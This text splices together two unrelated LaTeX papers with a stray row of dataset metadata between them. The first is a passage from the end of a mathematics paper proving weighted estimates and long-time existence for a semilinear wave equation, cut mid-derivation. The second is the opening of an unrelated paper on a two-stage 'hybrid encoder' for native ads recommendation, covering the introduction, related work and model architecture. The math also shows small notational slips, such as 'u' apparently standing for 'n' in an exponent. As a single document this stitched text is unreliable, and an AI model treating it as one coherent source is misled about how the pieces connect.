&\int_0^\infty\int_0^\infty r^{-\alpha}K_{2,2}(t,r)G(t,r)\d r\d t\\
=&\int_0^\infty\int_t^\infty \int_{0}^{\rho-t} \frac{r^{-\alpha}}{\rho+r-t}|h(\rho)|G(t,r)\d r\d\rho\d t\\
\lesssim &\int_0^\infty\int_t^\infty |h(\rho)|\kl\|\frac{r^{-\alpha}}{\rho+r-t} \kr\|_{L_r^p(0,\rho-t)}\|G\|_{L_r^{p'}}\d\rho\d t\\
\approx &\int_0^\infty\int_t^\infty |h(\rho)||\rho-t|^{-\alpha-1+\frac{1}{p}}\|G\|_{L_r^{p'}}\d\rho\d t\\
\lesssim &\kl\|\int_t^\infty |h(\rho)||\rho-t|^{-\alpha-1+\frac{1}{p}}\d\rho\kr\|_{L_t^{\sigma}}\\
\lesssim &\|h\|_{L_r^q},
\end{Eq*}
where in the last step we use the \emph{Hardy-Littlewood} inequality. Now, we find
\begin{Eq*}
\|r^{-\alpha}K_{2,2}\|_{L_t^\sigma L_r^p}\leq\sup\limits_{\|G\|_{L_t^{\sigma'}L_r^{p'}}\leq 1}\kl<r^{-\alpha}K_{2,2},G\kr>\lesssim \|h\|_{L_r^q}.
\end{Eq*}
Mixing these results, we obtain the estimate for $r<t$ part. For $r>t$, we have
\begin{Eq*}
r^{\frac{A-1}{2}}u_f=&\frac{1}{2}h(t+r)+\frac{1}{2}h(r-t)-\int_{r-t}^{t+r}\frac{t}{r\rho}I_A'(\mu)h(\rho)\d\rho\\
\equiv &K_1'+K_2'+K_3'.
\end{Eq*}
The estimate of $K_1'$ and $K_2'$ is the same as that of $K_1$ in $r<t$ part, and the estimate of $K_3'$ is the same as that of $K_4$. Adding all together, we finish the proof of $u_f$ part.
Finally, we consider $u=u_F$.
Using \Le{Le:u_e} and \Le{Le:I_p} again with $\mu=\frac{r^2+\rho^2-(t-s)^2}{2r\rho}$,
similarly we have
\begin{Eq*}
r^{\frac{A-1}{2}}u_F=&\int_0^t\int_{0}^{r+t-s}I_A(\mu)\rho^{\frac{A-1}{2}}F(s,\rho)\d\rho\d s\\
r^{\frac{A-1}{2}}|u_F|\lesssim&\int_0^t\int_{|r-t+s|}^{r+t-s}(1+\mu)^{-\delta}\rho^{-1}|G(s,\rho)|\d\rho\d s
\\
&+\iint\limits_{0\leq s\leq t\atop 0\leq \rho\leq t-s-r}(1-\mu)^{-1}|1+\mu|^{-\delta}\rho^{-1}|G(s,\rho)|\d\rho\d s
\end{Eq*}
where $G(s,\rho):=\rho^{\frac{A+1}{2}}F(s,\rho)$ and the second integral does not appear for $t-s<r$. Here we choose $\delta$ small enough. Using Proposition 4.5 in \cite{MR1408499}, we obtain the desired estimate for $u_F$.
Now, we finish the proof of \Le{Le:ul_e1}.
\end{proof}
\begin{proof}[Proof of \Le{Le:ul_e2}]
The proof of \Le{Le:ul_e2} is almost the same with that of Theorem 6.4 in \cite{MR1408499}. Thus, we only give a sketch of the proof.
The estimate \eqref{Eq:ul_e21} and part of estimate \eqref{Eq:ul_e22} are direct consequence of \eqref{Eq:ul_e11} with $q=p$.
We only need to show the estimate of
$T^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}u(T,r)\kr\|_{L_r^p(r<T/4)}$.
To dominate $u_f$, we separate $f=f_0+f_1$ with $f_0=\chi_{[0,T/4]}f$.
Then, $u_{f=f_1}$ depends on $f_1(\rho)$ with $T/4<\rho<5T/4$.
So, we obtain the weight of $T$ by extracting the weight of $\rho$.
For $u_{f=f_0}$, we find that $\rho,r<T/4$ in the expression of $u_{f=f_0}$
where $|1\pm\mu|^{-1}\approx r\rho/T^2$.
Then we get the desired estimate by a direct calculation.
The estimate of $u_g$ is similar to that of $u_f$. Finally for $u_F$, we separate the integral in $u_F$ into three parts: $\{r\geq(T-s)/4\}$, $\{r,\rho\leq(T-s)/4\}$ and $\{r\leq (T-s)/4\leq \rho\}$. Then we get the estimate by a similar discussion.
\end{proof}
\subsection{Long-time existence for $1<p<p_{conf}$}
In this subsection, we will give the proof of \Th{Th:M_2}.
The main process of proof is almost the same as that of \cite[Theorem 5.1, Theorem 6.1 and Theorem 6.3]{MR1408499}.
So we only prove global existence in $p_S<p<p_{conf}$ and long-time existence in $p_m\leq p<p_S$ to show such processes fit our frame.
\setcounter{part0}{0}
\value{parta}[Proof of $p_S< p<p_{conf}$]
Similar to the last section,
we will construct a Cauchy sequence to approach the weak solution.
We set $u_{-1}=0$ and let $u_{j+1}$ be the solution of the equation \eqref{Eq:uj_o}.
We are going to use the estimate \eqref{Eq:ul_e12},
where we set
\begin{Eq*}
q=\frac{2(p-1)}{(n+3)-(n-1)p},\qquad \sigma=pq,\qquad \alpha=\frac{(n-1)p-n-1}{2p}.
\end{Eq*}
Here $p<p_{conf}$ so $0<q<\infty$ and $p>p_S$ so $q>p$. Then, we conclude
\begin{Eq*}
\kl\|r^{\frac{(A-n)p+n+1}{2p}}u_{j+1}\kr\|_{L_t^{pq} L_r^p}\leq& \varepsilon C_0\Psi+C_0\|r^{\frac{(A-n)p+n+1}{2}}|u_{j}|^p\|_{L_t^qL_r^1}\\
\leq& \varepsilon C_0\Psi+C_0\|r^{\frac{(A-n)p+n+1}{2p}}u_{j}\|_{L_t^{pq}L_r^p}^p\\
\Psi:=&\kl\|r^\frac{n+1}{2}U_1\kr\|_{L_r^q}+\|r^{\frac{n-1}{2}}U_0\|_{L_r^q}\\
\end{Eq*}
for some $C_0$ large enough.
Then, for any $\varepsilon$ satisfies $(2\varepsilon C_0\Psi)^p<\varepsilon \Psi$ we find
\begin{Eq*}
\kl\|r^{\frac{(A-n)p+n+1}{2p}}u_{j}\kr\|_{L_t^{pq} L_r^p}\leq 2\varepsilon C_0\Psi
\end{Eq*}
holds for any $j\geq 0$. By this result and \eqref{Eq:ul_e12} we also find
\begin{Eq*}
&\kl\|r^{\frac{(A-n)p+n+1}{2p}}\kl(u_{j+1}-u_j\kr)\kr\|_{L_t^{pq} L_r^p}\\
\leq& C_0\|r^{\frac{(A-n)p+n+1}{2}}\kl(|u_{j}|^p-|u_{j-1}|^p\kr)\|_{L_t^qL_r^1}\\
\leq& C_1\|r^{\frac{(A-n)p+n+1}{2p}}(u_{j}-u_{j-1})\|_{L_t^{pq}L_r^p}\max_{k\in\{j,j-1\}}\|r^{\frac{(A-n)p+n+1}{2p}}u_k\|_{L_t^{pq}L_r^p}^{p-1}\\
\leq& C_1(2\varepsilon C_0\Psi)^{p-1}\|r^{\frac{(A-n)p+n+1}{2p}}(u_{j}-u_{j-1})\|_{L_t^{pq}L_r^p}
\end{Eq*}
with some $C_1$ large enough.
Now, for any $0<\varepsilon$ with $C_1(2\varepsilon C_0\Psi)^{p-1}<1/2$,
we find $\{u_j\}$ is a Cauchy sequence in its space.
Set the limit as $u$.
Using \eqref{Eq:ul_e11} we can also find
$\|r^{\frac{A-1}{2}}u\|_{L_t^\infty L_r^q}\leq 2\varepsilon C_2\Psi$ with some $C_2$.
To check it is the weak solution of \eqref{Eq:u_o} indeed,
we need to show \eqref{Eq:u_i_r}.
For any compact set $K_t\times K_r\subset {\mathbb{R}}_+^2$, we find
\begin{Eq*}
\kl\|r^{\frac{(A-n)p+n+A}{2}-1}|u|^p\kr\|_{L_{t,r}^1(K_t\times K_r)}\leq& C(K_t)\kl\|r^{\frac{(A-n)p+n+1}{2p}}u\kr\|_{L_t^{pq} L_r^p}^p\kl\|r^{\frac{A-3}{2}}\kr\|_{L_r^{\infty}(K_r)}\\
\leq& (2\varepsilon C_0\Psi)^pC(K_t,K_r)<\infty\\
\|r^{A-1}u\|_{L_{t,r}^1(K_t\times K_r)}\leq &C(K_t)\kl\|r^{\frac{A-1}{2}}u\kr\|_{L_t^\infty L_r^q}\kl\|r^{\frac{A-1}{2}}\kr\|_{L_r^{q'}(K_r)}\\
\leq& (2\varepsilon C_1\Psi)C(K_t,K_r)<\infty.
\end{Eq*}
This finishes the proof.
\value{parta}[Proof of $p_m\leq p<p_S$]
Next we consider $(n+1)/(n-1)\leq p< p_S$. Set
\begin{Eq*}
A_j(T):=T^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}u_{j}(T,r)\kr\|_{L_r^p},
\end{Eq*}
using \eqref{Eq:ul_e22} we see
\begin{Eq*}
A_{j+1}(T)\leq& \varepsilon C_0\Psi+ C_0T^{\frac{1}{p}}\|r^{\frac{(A-n)p+n+1}{2}}|u_j|^p\|_{L_t^\infty L_r^1(T/4<t<T)}
\\
&+C_0\|r^{\frac{(A-n)p+n+1}{2}}|u_j|^p\|_{L_t^pL_r^1(t<T/4)}\\
\leq& \varepsilon C_0\Psi+ C_0T^{\frac{1}{p}}\|t^{\frac{(1-n)p+n+1}{2p}}A_j(t)\|_{L_t^\infty(T/4<t<T)}^p
\\
&+C_0\|t^{\frac{(1-n)p+n+1}{2p}}A_j(t)\|_{L_t^{p^2}(t<T/4)}^p
\end{Eq*}
for some $C_0$ large enough and
\begin{Eq*}
\Psi:=\|r^{\frac{n+1}{2}+\frac{1}{p}}U_1\|_{L_r^\infty}+ \|r^{\frac{n-1}{2}+\frac{1}{p}}U_0\|_{L_r^\infty}
&+\|r^{\frac{u+1}{2}}U_1\|_{L_r^p}+ \|r^{\frac{n-1}{2}}U_0\|_{L_r^p}.
\end{Eq*}
When $\sup_{0\leq T\leq T_*}A_j(T)\leq 2\varepsilon C_0\Psi$ holds for some $j$ and $T_*$ defined in \eqref{Eq:Main_6} with $c$ to be fixed later, we find
\begin{Eq*}
\sup_{0\leq T\leq T_*} A_{j+1}(T)\leq&\varepsilon C_0\Psi+ C_1(2\varepsilon C_0 \Psi)^pT_*^{\frac{(1-n)p^2+(n+1)p+2}{2p}}\\
\leq&\varepsilon C_0\Psi+ \varepsilon C_1(2 C_0 \Psi)^p c^{\frac{-h_S}{2p}}
\end{Eq*}
with some $C_1$. Choosing $c$ small enough such that $C_1(2 C_0 \Psi)^p c^{\frac{-h_S}{2p}}\leq C_0\Psi$ and noticing $A_{-1}(T)\equiv 0$, we find such estimate holds for any $j$. A similar manner also shows
\begin{Eq*}
\sup_{0\leq T\leq T_*} B_{j+1}(T)\leq& \frac{1}{2}\sup_{0\leq T\leq T_*} B_{j}(T),\\
B_{j}(T):=&T^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}\kl(u_{j}-u_{j-1}\kr)(T,r)\kr\|_{L_r^p}.
\end{Eq*}
Then, we get the desired solution $u$ as the limit of $\{u_j\}$.
Now we check \eqref{Eq:u_i_r}. For any compact set $K_t\times K_r\subset {\mathbb{R}}_+^2$, we find
\begin{Eq*}
\kl\|r^{\frac{(A-n)p+n+A}{2}-1}|u|^p\kr\|_{L_{t,r}^1(K_t\times K_r)}\leq& \kl\|t^{\frac{(n-1)p-n-1}{2p}}r^{\frac{(A-n)p+n+1}{2p}}u\kr\|_{L_t^\infty L_r^p}^p\\
&\times \kl\|t^{\frac{(1-n)p+n+1}{2}}r^{\frac{A-3}{2}}\kr\|_{L_t^1 L_r^\infty(K_t\times K_r)},\\
\|r^{A-1}u\|_{L_{t,r}^1(K_t\times K_r)}\leq &\kl\|t^{\frac{(n-1)p-n-1}{2p}}r^{\frac{(A-n)p+n+1}{2p}}u\kr\|_{L_t^\infty L_r^p}\\
&\times\kl\|t^{\frac{(1-n)p+n+1}{2p}}r^{\frac{(n+A-2)p-n-1}{2p}}\kr\|_{L_t^1 L_r^{p'}(K_t\times K_r)}.
\end{Eq*}
Noticing $\frac{(n+A-2)p-n-1}{2p}>\frac{A-3}{2p}\geq 0$ and $\frac{(1-n)p+n+1}{2}>-1$ due to $p<p_S<p_{conf}$, we find both of the above two terms are finite.
This finishes the proof.
\subsection*{Acknowledgments}
The authors would like to thank the anonymous referee for the careful reading and valuable comments.
The authors were supported by NSFC 11671353 and NSFC 11971428.
| 2024-02-18T23:40:19.403Z | 2021-11-23T02:15:44.000Z | algebraic_stack_train_0000 | 2,051 | 19,894 |
|
proofpile-arXiv_065-10068 | \section{Introduction}
Native ads are important ways of online advertising, where advertisements are
imperceptibly injected into the webpages being browsed by the users. In contrast to the conventional search ads where queries are explicitly specified by user, native ads are recommended implicitly based on user's web-browsing history. Apparently, high-quality recommendation calls for deep understanding of user behavior and ad content. In recent years, transformer-based models turn out to be popular solutions due to their superior capability on natural language processing, e.g., Bert \cite{devlin2018bert} and RoBerta \cite{liu2019roberta}. The existing methods would represent a pair of input sequences independently with a siamese encoder \cite{reimers2019sentence,lu2020twinbert} (as the two-tower architecture in Figure \ref{fig:baseline}.A), and measure their relevance based on the embeddings' similarity, such as cosine and inner-product. With these approaches, relevant ads can be efficiently acquired via ANN search, like PQ \cite{jegou2010product, ge2013optimized} and HNWS \cite{malkov2018efficient}. However, one obvious defect is that there is no interaction between the user and ad encoding process. Given that the underlying semantic about user and ad can be complicated, such independently generated embeddings is prone to information loss, thus cannot reflect the user-ad relationship precisely. In contrast, another form of transformer encoding networks, the cross-encoder (as the one-tower structure in Figure \ref{fig:baseline}.B), can be much more accurate \cite{luan2020sparse,lee2019latent}, where the input sequences may fully attend to each other during the encoding process. Unfortunately, the cross-encoder is highly time-consuming and hardly feasible
for realtime services like native ads recommendation, as every pair of user and ad needs to be encoded and compared from scratch. The above challenges bring us to a challenging problem: whether some sort of encoding architecture can be both efficient and precise. Motivated by this challenge, we propose hybrid encoder, which addresses the above problem with the following featurized designs.
$\bullet$ \textbf{Two-stage workflow}. Instead of making recommendation in one shot, hybrid encoder selects appropriate ads through two consecutive steps: retrieval and ranking, with two sets of user and ad representations. First of all, it represents user and ad independently with a siamese encoder, such that relevant candidates can be retrieved via ANN search. Secondly, it generates disentangled ad embeddings and ad-related user embeddings, based on which high-quality ads can be identified from the candidate set. Both steps are highly efficient, which makes the time cost affordable in practice.
$\bullet$ \textbf{Fast ranking}. Unlike the conventional time-consuming cross-encoder, hybrid-encoder establishes the user-ad interaction by intensively re-using the cached hidden-states and pre-computation result. On the one hand, it caches the transformer's last-layer hidden-states for the user, which will comprehensively preserve the information about user's web-browsing behaviors. On the other hand, it pre-computes the disentangled embeddings for each ad. While an ad is chosen as a user's candidate, the disentangled ad embeddings will attend to the user's cached hidden-states, which gives rise to the ``ad-related'' user embeddings. With such embeddings, necessary information for analyzing user-ad relationship can be effectively extracted, which in return contributes to the selection of best ads from the candidate set. Apparently, most of the involved operations are light-weighted, e.g., inner-product and summation, whose time cost is almost neglectable compared with the feed-forward inference of transformer. Therefore, the running time of the ranking step is approximately up-bounded by one pass of transformer encoding.
$\bullet$ \textbf{Progressive Training Pipeline}. Although both the retrieval and ranking step aim to find out appropriate advertisements w.r.t. the presented user, they are actually deployed for distinct purposes, thus need to be learned in different ways. In this work, a progressive learning strategy is adopted to optimize the overall performance of the two-stage workflow. For one thing, the retrieval step is to select coarse-grained candidates from the whole advertisement corpus; therefore, it is trained with \textit{global contrast learning}, which discriminates the ground-truth from the negative ones sampled from the global scope. For another thing, the ranking step is to select the best advertisements from the candidate set generated by a certain retrieval policy. Therefore, the model is further trained with the \textit{local contrast learning}, where a set of candidate advertisements are sampled based on the retrieval policy learned in the first stage, and the model is required to identify the ground-truth given such ``hard negative samples''.
Comprehensive empirical investigation are performed on Microsoft Audience Ads\footnote{https://about.ads.microsoft.com/en-us/solutions/microsoft-audience-network/microsoft-audience-ads} platform, where the hybrid encoder's effectiveness is verified from the following aspects. \textbf{I.} It achieves comparable recommendation quality as the accurate but expensive cross-encoder, given that the running time is sufficiently large. \textbf{II.} It significantly outperforms the conventional siamese encoder when the time cost is limited within a tolerable range as required by the production. Additional studies are also made with public-available dataset, which further confirms the above findings.
To sum up, the following contributions are made in this work.
\\
$\bullet$ We propose hybrid encoder, which recommends native ads with a two-stage workflow: the retrieval step collects coarse-grained candidates from the whole corpus; the ranking step selects the best ads from the given candidates. Both steps are highly efficient, which collaboratively produce precise recommendation for the user.
\\
$\bullet$ The proposed model is trained progressively through global contrast learning and local contrast learning, which optimizes the overall performance of the two-stage recommendation workflow.
\\
$\bullet$ The effectiveness of hybrid encoder is verified with large-scale data from native ads production. Compared with conventional transformer encoders, hybrid encoder is competitive in terms of both recommendation precision and working efficiency.
\begin{figure}[t]
\centering
\includegraphics[width=0.92\linewidth]{Figures/one_two.pdf}
\caption{Illustration of conventional transformer encoders. (A) siamese encoder: user's browsed webs and ad's description are encoded independently, whose relevance is calculated as the embedding similarity. (B) cross encoder: user's browsed webs and ad's description are concatenated into one token list and jointly encoded by a unified transformer; the relevance is computed based on final hidden-states, usually the one corresponding to [CLS] token. }
\label{fig:baseline}
\end{figure}
\section{Related Work}
In this section, related works are discussed from the following perspectives: 1) native ads recommendation, and 2) transformer encoding networks.
\subsection{Native Ads Recommendation}
Native ads is a relatively new form of online advertising, where advertisements are recommended to user based on their web-browsing behaviors. A typical recommendation workflow is composed of the following operations. Particularly, each advertisement is characterized with a compact description, e.g., new apple ipad mini. When an advertising request is presented, it turns user's browsed web-pages into ``implicit queries'' and finds out the most relevant ads-descriptions. Finally, the selected ads will be displayed imperceptibly on the web-pages being browsed by the user. In the early days, the recommendation process would intensively make use of the retrieval algorithms built on explicit features: each ads-description is further split into a set of keywords, based on which an inverted index can be built to organize the whole advertisements. To make the index more accurate and compact, conventional IR techniques like TF-IDF and BM25 are adopted so as to identify the most important keywords for index \cite{robertson2009probabilistic, manning2008introduction}. Given an implicit query from user, the system will extract its keywords in the first place, and then join with the inverted index so as to collect the advertisements within the matched entries.
Apparently, the old-fashioned approaches can be severely limited by the ratio of keyword-overlap. To overcome such a defect, more and more effort has been made on latent retrieval \cite{fan2019mobius,huang2020embedding}, where the semantic relationship between user and ad can be measured more precisely with compact embeddings. Early representative works along this direction includes DSSM \& CDSSM \cite{huang2013learning,shen2014latent}, where multi-layer-perception and convolutional neural networks are adopted; in recent years, much more advanced approaches are continuously developed, especially based on transformer encoders and pretrained language models, such as \cite{reimers2019sentence,lu2020twinbert,karpukhin2020dense,guu2020realm,lee2019latent}.
\subsection{Transformer Encoding Networks}
Transformer is a powerful network structure for text encoding \cite{vaswani2017attention}, as long range interactions can be established for the input sequence on top of multi-head self-attention. In recent years, multi-layer transformer encoders have become the foundation of almost every large-scale pretrained language model, like BERT \cite{devlin2018bert} and RoBerta \cite{liu2019roberta}, with which the underlying semantic can be captured in-depth for the presented text. Given its superior capability in various NLP applications, transformer is also used as the backbone network structure for text retrieval \cite{reimers2019sentence,lu2020twinbert,karpukhin2020dense}. Typically, a two-tower transformer encoding network (also known as \textit{siamese encoder} or \textit{bi-encoder}) are deployed, which generates the latent representations for the source and target text segments; after that, the source and target relevance can be measured with the embedding similarity, e.g., cosine or inner-product. The siamese encoder naturally fits the need of large-scale retrieval/recommendation, as relevant targets can be efficiently acquired for the given source via those well-known ANN paradigms, e.g., PQ \cite{jegou2010product,ge2013optimized} and HNSW \cite{malkov2018efficient}. However, one obvious limitation about the siamese encoder is that the source and target are encoded independently; in other words, there is no interaction between the source and target's encoding process. Such a problem may lead to the ignoring of important information for the generated embeddings, which harms the model's accuracy. According to \cite{luan2020sparse}, this problem will be more severe as the input sequence becomes longer.
An intuitive way of addressing the above problem is to make use of the one-tower transformer encoder \cite{luan2020sparse}, usually referred as \textit{cross-encoder}, where the inputs are combined into one sequence and jointly processed by a unified encoding networks. However, this architecture needs to encode every pair of inputs from scratch for comparison, whose running time is prohibitive for most of the realtime services, like native ads recommendation (where hundreds or up-to-thousand comparisons need to be made within millisecond-scale). Recently, it becomes more and more emphasized on how to acquire accurate matching result in an temporally-efficient manner. One promising option is to establish the interaction between inputs on top of the transformer's hidden-states \cite{humeau2019poly,luan2020sparse}. For example, in \cite{humeau2019poly}, the hidden-states of the source sequence are mapped into a total of $K$ embeddings called context vectors; the context vectors will be further aggregated w.r.t. the target embedding via attentive pooling; finally, the aggregation result will be compared with the target embedding so as to reflect the source-target relevance. Our work also takes advantage of the hidden-states. Unlike the conventional methods, the interaction between inputs is established based on raw hidden-states of the source and disentangled embeddings of the target, which turns out to be both efficient and more effective.
\section{Methodology}
\subsection{Preliminaries}\label{sec:met-pre}
Transformer encoding networks have been proved to be a powerful tool for natural language understanding, which significantly benefit downstream tasks, like recommendation and information retrieval. Such networks consist of multiple layers of transformer blocks \cite{vaswani2017attention}, which are built upon multi-head self-attention (MHSA). For each particular layer, the input embeddings (used as $Q$, $K$ and $V$) are interacted with each other via the following operations:
\begin{equation}
\begin{gathered}
\mathrm{MHSA}(Q, K, V) = \mathrm{Concat}(head_1,...,head_h)W^O, \\
head_i = \mathrm{Attention}(QW_i^Q, KW_i^K, VW_i^V).
\end{gathered}
\end{equation}
where $W^O$, $W_i^Q$, $W_i^K$, $W_i^V$ are the projection matrices to be learned. In transformers, the scaled dot-product attention is adopted, which computes the weighted-sum of $V$ with the following equation:
\begin{equation}
\mathrm{Attention}(Q, K, V) = \mathrm{softmax}(\frac{QK^T}{\sqrt{d}})V,
\end{equation}
where $d$ indicates the value of hidden vector's dimension. Apparently, MHSA has the advantage of introducing long-range interaction for the input sequence, which brings about stronger context-awareness for the generated representations.
While applied for IR/recommendation-related tasks, transformer encoding networks usually adopt the following two forms: the siamese encoder and the cross encoder. In the following part, we will demonstrate how the above forms of encoders are applied for the native ads recommendation scenario.
\subsubsection{siamese Encoder} The siamese encoder leverages a pair of identical sub-networks to process the user history and ads description, as shown in Figure \ref{fig:baseline} (A). Each sub-network will aggregate the last layer's hidden states for the representation of its input sequence; as a result, two embeddings $E_{u}$ and $E_{a}$ will be generated, which are of the same hidden dimension. The user-ad relevance is measured based on the similarity between the embeddings:
\begin{equation}
Rel(u, a) = \langle E_{u}, E_{a} \rangle,
\end{equation}
where $\langle \cdot \rangle$ stands for the similarity measurement, e.g., inner-product. The good thing about siamese encoder is that the user history and ad description can be encoded once and used for relevance computation everywhere. More importantly, the generated embeddings can be indexed for ANN-search (e.g., MIPS \cite{jegou2010product}), which naturally fits the need of large-scale retrieval/recommendation. However, the siamese encoder is prone to information loss, as user and ad are independently encoded. Therefore, it is usually limited by its inferior accuracy.
\begin{figure*}[t]
\centering
\includegraphics[width=0.85\textwidth]{Figures/hybrid.pdf}
\caption{Infrastructure of Hybrid Encoder. In the middle and left side, the user embedding $E_u$ and ad embedding $E_a$ are generated independently; both embeddings are used for the ANN search in the retrieval step. On the middle and right side, the disentangled ad embeddings $M_a$ are offline generated, which are used to attend user's cached hidden-states for the ad-related user embeddings; both embeddings are flattened into 1-D vecs and compared to measure the fine-grained user-ad relationship.}
\label{fig:hybrid}
\end{figure*}
\subsubsection{Cross Encoder} The cross encoder makes use of a unified transformer to analyze the relevance between the user and ad. In particular, the input sequences are concatenated into the following joint string marked with [CLS] and [SEP]:
\begin{equation}
[CLS]t_0^{user},...,t_M^{user}[SEP]t_0^{ad},...,t_N^{ad},
\end{equation}
where $t_{\cdot}^{user}$ and $t_{\cdot}^{ad}$ indicate tokens from user's browsed web-pages and ad description, respectively. The joint string will be encoded by the transformer. And based on the last layer's hidden-state corresponding to [CLS], denoted as $H_{[CLS]}$, the web-ad relevance is calculated as:
\begin{equation}\label{eq:cross}
Rel(user, ads) = \sigma(H_{[CLS]} W_A),
\end{equation}
where $W_A$ is the $d\times1$ linear projection vector for the output logit. The cross encoder is of much higher model capacity compared with the siamese encoder, as user and ad may fully get attended by each other within the encoding process. Therefore, cross encoder can be much more accurate, as important information is preserved more effectively. However, the cross encoder is highly limited in working efficiency, as every pair of user and ad need to be encoded from scratch so as to find out the most relevant result.
\subsection{Overview of Hybrid Encoder}
\subsubsection{Problem Formulation}
We consider the scenario where natives ads recommended are based on user's web-browsing behaviors. In this place, the following definition is presented, which clarifies the objective of native ads recommendation (NAR).
\begin{definition}
(NAR) Given user's web-browsing history, NAR looks for the advertisement $a$, which gives rise to the maximum probability of being clicked.
\end{definition}
It is apparent that the NAR problem can be quantitatively expressed by the following optimization problem:
\begin{equation}
\max \mathbb{E}_{(u,a) \sim P(u,a)} \log \pi(a|u),
\end{equation}
where $P(u,a)$ stands for the joint probability of user-$u$-click-ad-$a$, and $\pi(a|u)$ refers to the advertisement's probability of being recommended by NAR conditioned on the user's web-browsing history. By optimizing the above objective, the recommendation algorithm is expected to produce the maximum amount of ad-clicks, which contributes to the revenue growth of the whole market.
\subsubsection{Two-Stage Processing}\label{sec:met-ov-two} To facilitate efficient and precise native ads recommendation, a two-stage workflow is employed, which contains the consecutive steps of retrieval and ranking. The retrieval step is to select relevant candidate ads w.r.t. the presented user. Given that the size of the whole advertisement set can be huge (usually as large as a few millions), the retrieval steps must be highly efficient. Thus, approximate nearest neighbour search turns out to be a natural choice. To make use of it, user history and ad description are independently encoded as $E_{u}$ and $E_{a}$, and the user-ad relevance is measured with the embedding similarity. As a result, we'll efficiently get the candidate ads for the retrieval step via ANN search:
\begin{equation}
\Omega_{retr} = \mathrm{ANN}(E_u, \{E_a|\Omega_A\})
\end{equation}
where $\{E_a|\Omega_A\}$ denotes the embeddings of whole ads. Following the retrieval step, the ranking step is carried out so as to select the best set of ads out of the coarse-grained candidates. For the sake of better recommendation quality, a ranking function $f(\cdot)$ will be utilized, which is able to establish the interaction between user and each of the candidate ads. Finally, the fine-grained set of ads for recommendation can be determined based on the ranking scores:
\begin{equation}
\Omega_{rank} = \mathrm{Top}\text{-}K \{ f(u,a) | \Omega_{retr} \}
\end{equation}
\subsubsection{Online Cost Analysis}\label{sec:met-ov-time} The running time of the above two-stage processing is constituted of three parts: the user and ad embedding generation, the ANN search, and the ranking of candidates. However, because the in-market ads are temporally invariant and given beforehand, the ad embeddings can all be generated offline; besides, compared with the model's inference cost, the ANN search is fast and its time complexity is constant (or sub-linear). Therefore, the online cost will be determined mainly by two factors: the \textit{generation of user embedding} and \textit{the ranking of candidates}. The generation of user embedding takes one-pass of transformer encoding. And with the conventional cross-encoder, it takes $|\Omega_{retr}|$ rounds of transformer encoding to rank the candidates. Finally, there will be $|\Omega_{retr}|+1$ rounds of transformer encoding in total, which is still temporally infeasible for native ads production. Apparently, the ranking step turns out to be the efficiency bottleneck of the two-stage workflow. In the following discussion, a significantly accelerated ranking operation will be introduced, where the time cost is reduced to $\epsilon$ transformer encoding ($\epsilon\leq1$). As a result, it will merely take $1+\epsilon$ transformer encoding, which makes hybrid encoder competitive in working efficiency.
\subsection{Model Architecture}
The architecture of hybrid encoder is shown in Figure \ref{fig:hybrid}, where multiple transformers are jointly deployed for the hybrid encoding process. On the left and middle side of the model, the deployed transformers take the form of a siamese encoder, where user and ad embeddings, $E_u$ and $E_a$, are generated independently. These embeddings are used for the ANN search of the retrieval step. On the middle and right side, the disentangled ad embeddings $M_a$ are generated, which may capture ad semantic more comprehensively; meanwhile, the disentangled ad embeddings will attend to the cached hidden-states of the ua-interaction network, which gives rise to a total of $|M_a|$ ``ad-related'' user embeddings $M_u$. Finally, the disentangled ad embeddings and ad-related user embeddings are flatten into 1-D vectors and compared, which helps to make fine-grained analysis of user-ad relationship for the ranking step.
\subsubsection{User and Ad Embedding Generation}\label{sec:met-mod-sia}
The user's browsed web-pages and ads' descriptions are independently feed into the user embedding network and the ad embedding network. Unlike the default practice where the [CLS] token's hidden-state in the last-layer is taken as the representation result, we use the mean-pooling of all tokens' hidden-states in the last-layer as the user and ad embeddings, which is suggested to be more effective \cite{reimers2019sentence,lu2020twinbert}:
\begin{equation}
\begin{gathered}
E_u = \text{mean}(H^u), ~where~ H^u = \text{U-Net}(\text{user's browsed webs}); \\
E_a = \text{mean}(H^a), ~where~ H^a = \text{A-Net}(\text{ad description}).
\end{gathered}
\end{equation}
As the user and ad embeddings need to support the ANN search operation in the retrieval step, $E_u$ and $E_a$ must be within the same latent space, whose similarity is directly comparable. As a result, the user-ad relevance for the retrieval step is computed as:
\begin{equation}\label{eq:siamese}
Rel_{retr}(u,a) = \langle E_u, E_a \rangle.
\end{equation}
In our implementation, we use inner-product as the similarity measure and adopt HNSW for the search of approximate neighbours.
\subsubsection{Fast Ranking with UA Interaction}
The interaction between user and ad is established via ua-interaction network, as shown on the right side of Figure \ref{fig:hybrid}. In this stage, the following three operations are carried out step-by-step. First of all, it generates $K$ disentangled ad embeddings $M_a$ with multi-head attention \cite{lin2017structured}:
\begin{equation}
\begin{gathered}
M_a : \{ M_a^i = \sum\nolimits_{H^a} \alpha^i_j H^a_j | i=1,...,K \}, \\
~ where ~ \boldsymbol{\alpha}^i = \text{softmax}(H^a, \boldsymbol{\theta}^i).
\end{gathered}
\end{equation}
In the above equation, $\{\boldsymbol{\theta}^i\}_1^K$ stands for the attention heads, which aggregate the hidden-states of the advertisement from different views for more comprehensive representation. Secondly, each of the disentangled ad embeddings is used to attend user's last-layer hidden-states $H^{ua}$ from the ua-interaction network. As a result,the following ad-related user embeddings $M_u$ will be generated:
\begin{equation}
\begin{gathered}
M_u: \{ M_u^i = \sum\nolimits_{H^{ua}} \alpha^i_j H^{ua}_j | i=1,...,K \}, \\
~ where ~ \boldsymbol{\alpha}^i = \text{softmax}(H^{ua}, M_a^i).
\end{gathered}
\end{equation}
Finally, the disentangled ad embeddings $M_a$ and the ad-related user embeddings $M_u$ are flattened and concatenated into 1-D vectors, whose similarity is used as the measurement of user-ad relevance for the ranking step:
\begin{equation}\label{eq:hybrid}
\begin{gathered}
Rel_{rank}(u,a) = \langle \bar{M}_u, \bar{M}_a \rangle, \\
where ~ \bar{M}_u = \text{cat}([M_u^1,...,M_u^K]), ~ \bar{M}_a = \text{cat}([M_a^1,...,M_a^K]).
\end{gathered}
\end{equation}
